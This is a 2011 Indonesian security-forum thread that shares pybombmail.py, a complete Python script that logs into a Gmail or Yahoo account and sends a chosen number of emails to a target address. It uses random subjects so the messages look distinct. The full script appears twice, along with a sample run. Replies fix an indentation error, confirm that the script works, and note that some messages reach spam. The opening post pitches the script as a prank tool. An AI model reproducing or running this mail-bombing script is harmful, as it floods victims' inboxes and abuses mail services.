Indonesian Back|Track Team
Bomb email with pybombmail.py - Printable Version

+- Indonesian Back|Track Team (https://www.indonesianbacktrack.or.id/forum)
+-- Forum: Penetration Testing Os (https://www.indonesianbacktrack.or.id/forum/forum-170.html)
+--- Forum: Backtrack (https://www.indonesianbacktrack.or.id/forum/forum-171.html)
+---- Forum: BackTrack 5 (https://www.indonesianbacktrack.or.id/forum/forum-74.html)
+----- Forum: BackTrack 5 tutorial (https://www.indonesianbacktrack.or.id/forum/forum-82.html)
+----- Thread: Bomb email with pybombmail.py (/thread-785.html)

Pages: 1 2 3 4 5


Bomb email with pybombmail.py - gtx150 - 09-16-2011

Lagi jalan2 di google nemu script buat bomb email, nama nya pybombmail.py
sangat cocok untuk yg berjiwa iseng, tp di tutor ini ane ngeboom email ane sendiri.

nih bro script nya:
Code:
#!/usr/bin/python
#pybombmail.py by aBi71
#This code for education purpose only.
#Use it at your own risk !!!

import os
import smtplib
import getpass
import sys

server = raw_input ('Server Mail: ')
user = raw_input('Username: ')
passwd = getpass.getpass('Password: ')

to = raw_input('\nTo: ')
#subject = raw_input('Subject: ')
body = raw_input('Message: ')
total = input('Number of send: ')

if server == 'gmail':
    smtp_server = 'smtp.gmail.com'
    port = 587
elif server == 'yahoo':
    smtp_server = 'smtp.mail.yahoo.com'
    port = 25
else:
    print 'Applies only to gmail and yahoo.'
    sys.exit()

print ''

try:
    server = smtplib.SMTP(smtp_server,port)
    server.ehlo()
    if smtp_server == "smtp.gmail.com":
            server.starttls()
    server.login(user,passwd)
    for i in range(1, total+1):
        subject = os.urandom(9)
        msg = 'From: ' + user + '\nSubject: ' + subject + '\n' + body
        server.sendmail(user,to,msg)
        print "\rTotal emails sent: %i" % i
        sys.stdout.flush()
    server.quit()
    print '\n Done !!!'
except KeyboardInterrupt:
    print '[-] Canceled'
    sys.exit()
except smtplib.SMTPAuthenticationError:
    print '\n[!] The username or password you entered is incorrect.'
    sys.exit()


setelah itu save script diatas dengan pybombmail.py dan pastikan executeable.

untuk jalaninnya ketik:

Code:
root@bt:~#./pybombmail.py
Server Mail: gmail
Username: [email protected]
Password:

To: [email protected]
Message: test
Number of send: 3

Total emails sent: 1
Total emails sent: 2
Total emails sent: 3

Done !!!

note: untuk Number of send suka2 deh isinya.

"Do with your own Risk"

sumber: https://abi71.wordpress.com/2011/02/03/pybombmail-py/






RE: Bomb email with pybombmail.py - THJC - 09-16-2011

ane coba,,, malah error om

Quote:| _ \ ___ _ __ _ __(_) |_ ___
| | | |/ _ \ '_ \| '__| | __/ _ \
| |_| | __/ |_) | | | | || (_) |
|____/ \___| .__/|_| |_|\__\___/
|_|
root@WindwetaAyu:/home/deprito# ./bomail.py
File "./bomail.py", line 21
smtp_server = 'smtp.gmail.com'
^
IndentationError: expected an indented block
root@WindwetaAyu:/home/deprito#



RE: Bomb email with pybombmail.py - gtx150 - 09-16-2011

script nya udah dibuat executeable belum bro?

kalo ga berhasil juga coba langsung copas scriptnya dari sumbernya langsung..........

:beer:


RE: Bomb email with pybombmail.py - THJC - 09-16-2011

(09-16-2011, 09:44 PM)gtx150 Wrote: script nya udah dibuat executeable belum bro?

kalo ga berhasil juga coba langsung copas scriptnya dari sumbernya langsung..........

:beer:

setelah dari sumber, work om Smile


RE: Bomb email with pybombmail.py - u5h4nt - 09-16-2011

(09-16-2011, 09:40 PM)THJC Wrote: ane coba,,, malah error om

Quote:| _ \ ___ _ __ _ __(_) |_ ___
| | | |/ _ \ '_ \| '__| | __/ _ \
| |_| | __/ |_) | | | | || (_) |
|____/ \___| .__/|_| |_|\__\___/
|_|
root@WindwetaAyu:/home/deprito# ./bomail.py
File "./bomail.py", line 21
smtp_server = 'smtp.gmail.com'
^
IndentationError: expected an indented block
root@WindwetaAyu:/home/deprito#

Klo errornya indentation berarti ada blok kode yg tidak sejajar !! kayaknya gitu .. seperti ini

Code:
if server == 'gmail':
smtp_server = 'smtp.gmail.com'
port = 587
elif server == 'yahoo':
smtp_server = 'smtp.mail.yahoo.com'
port = 25
else:
print 'Applies only to gmail and yahoo.'
sys.exit()

seharusnya ditulis :
Code:
if server == 'gmail':
    smtp_server = 'smtp.gmail.com'
    port = 587
elif server == 'yahoo':
    smtp_server = 'smtp.mail.yahoo.com'
    port = 25
else:
    print 'Applies only to gmail and yahoo.'
    sys.exit()

selengkapnya :
Code:
#!/usr/bin/python
#pybombmail.py by aBi71
#This code for education purpose only.
#Use it at your own risk !!!

import os
import smtplib
import getpass
import sys

server = raw_input ('Server Mail: ')
user = raw_input('Username: ')
passwd = getpass.getpass('Password: ')

to = raw_input('\nTo: ')
#subject = raw_input('Subject: ')
body = raw_input('Message: ')
total = input('Number of send: ')

if server == 'gmail':
    smtp_server = 'smtp.gmail.com'
    port = 587
elif server == 'yahoo':
    smtp_server = 'smtp.mail.yahoo.com'
    port = 25
else:
    print 'Applies only to gmail and yahoo.'
    sys.exit()

print ''

try:
    server = smtplib.SMTP(smtp_server,port)
    server.ehlo()
    if smtp_server == "smtp.gmail.com":
        server.starttls()
    server.login(user,passwd)
    for i in range(1, total+1):
        subject = os.urandom(9)
        msg = 'From: ' + user + '\nSubject: ' + subject + '\n' + body
        server.sendmail(user,to,msg)
        print "\rTotal emails sent: %i" % i
        sys.stdout.flush()
    server.quit()
    print '\n Done !!!'
except KeyboardInterrupt:
    print '[-] Canceled'
    sys.exit()
except smtplib.SMTPAuthenticationError:
    print '\n[!] The username or password you entered is incorrect.'
    sys.exit()


n work !! Smile


RE: Bomb email with pybombmail.py - THJC - 09-16-2011

(09-16-2011, 10:12 PM)RR12 Wrote:
(09-16-2011, 09:40 PM)THJC Wrote: ane coba,,, malah error om

Quote:| _ \ ___ _ __ _ __(_) |_ ___
| | | |/ _ \ '_ \| '__| | __/ _ \
| |_| | __/ |_) | | | | || (_) |
|____/ \___| .__/|_| |_|\__\___/
|_|
root@WindwetaAyu:/home/deprito# ./bomail.py
File "./bomail.py", line 21
smtp_server = 'smtp.gmail.com'
^
IndentationError: expected an indented block
root@WindwetaAyu:/home/deprito#

Klo errornya indentation berarti ada blok kode yg tidak sejajar !! kayaknya gitu .. seperti ini

Code:
if server == 'gmail':
smtp_server = 'smtp.gmail.com'
port = 587
elif server == 'yahoo':
smtp_server = 'smtp.mail.yahoo.com'
port = 25
else:
print 'Applies only to gmail and yahoo.'
sys.exit()

seharusnya ditulis :
Code:
if server == 'gmail':
    smtp_server = 'smtp.gmail.com'
    port = 587
elif server == 'yahoo':
    smtp_server = 'smtp.mail.yahoo.com'
    port = 25
else:
    print 'Applies only to gmail and yahoo.'
    sys.exit()

selengkapnya :
Code:
#!/usr/bin/python
#pybombmail.py by aBi71
#This code for education purpose only.
#Use it at your own risk !!!

import os
import smtplib
import getpass
import sys

server = raw_input ('Server Mail: ')
user = raw_input('Username: ')
passwd = getpass.getpass('Password: ')

to = raw_input('\nTo: ')
#subject = raw_input('Subject: ')
body = raw_input('Message: ')
total = input('Number of send: ')

if server == 'gmail':
    smtp_server = 'smtp.gmail.com'
    port = 587
elif server == 'yahoo':
    smtp_server = 'smtp.mail.yahoo.com'
    port = 25
else:
    print 'Applies only to gmail and yahoo.'
    sys.exit()

print ''

try:
    server = smtplib.SMTP(smtp_server,port)
    server.ehlo()
    if smtp_server == "smtp.gmail.com":
        server.starttls()
    server.login(user,passwd)
    for i in range(1, total+1):
        subject = os.urandom(9)
        msg = 'From: ' + user + '\nSubject: ' + subject + '\n' + body
        server.sendmail(user,to,msg)
        print "\rTotal emails sent: %i" % i
        sys.stdout.flush()
    server.quit()
    print '\n Done !!!'
except KeyboardInterrupt:
    print '[-] Canceled'
    sys.exit()
except smtplib.SMTPAuthenticationError:
    print '\n[!] The username or password you entered is incorrect.'
    sys.exit()


n work !! Smile

yap, setelah copas sumbernya.. work..

Smile manteb lah om RR12 ini


RE: Bomb email with pybombmail.py - iKONspirasi - 09-16-2011

usahakan klo copas skrip menggunakan tag code bro bukan quote, biar identik dengan aslinya Smile


RE: Bomb email with pybombmail.py - guitariznoize - 09-16-2011

(09-16-2011, 10:50 PM)konspirasi Wrote: usahakan klo copas skrip menggunakan tag code bro bukan quote, biar identik dengan aslinya Smile

setuju...:badpc:


RE: Bomb email with pybombmail.py - gtx150 - 09-16-2011

(09-16-2011, 10:50 PM)konspirasi Wrote: usahakan klo copas skrip menggunakan tag code bro bukan quote, biar identik dengan aslinya Smile

oke om, ane lupa............hehehehehe


RE: Bomb email with pybombmail.py - ezzaez - 09-16-2011

juara ni script ahaha
tapi sebagian masuk SPAM yah

it's works bro Smile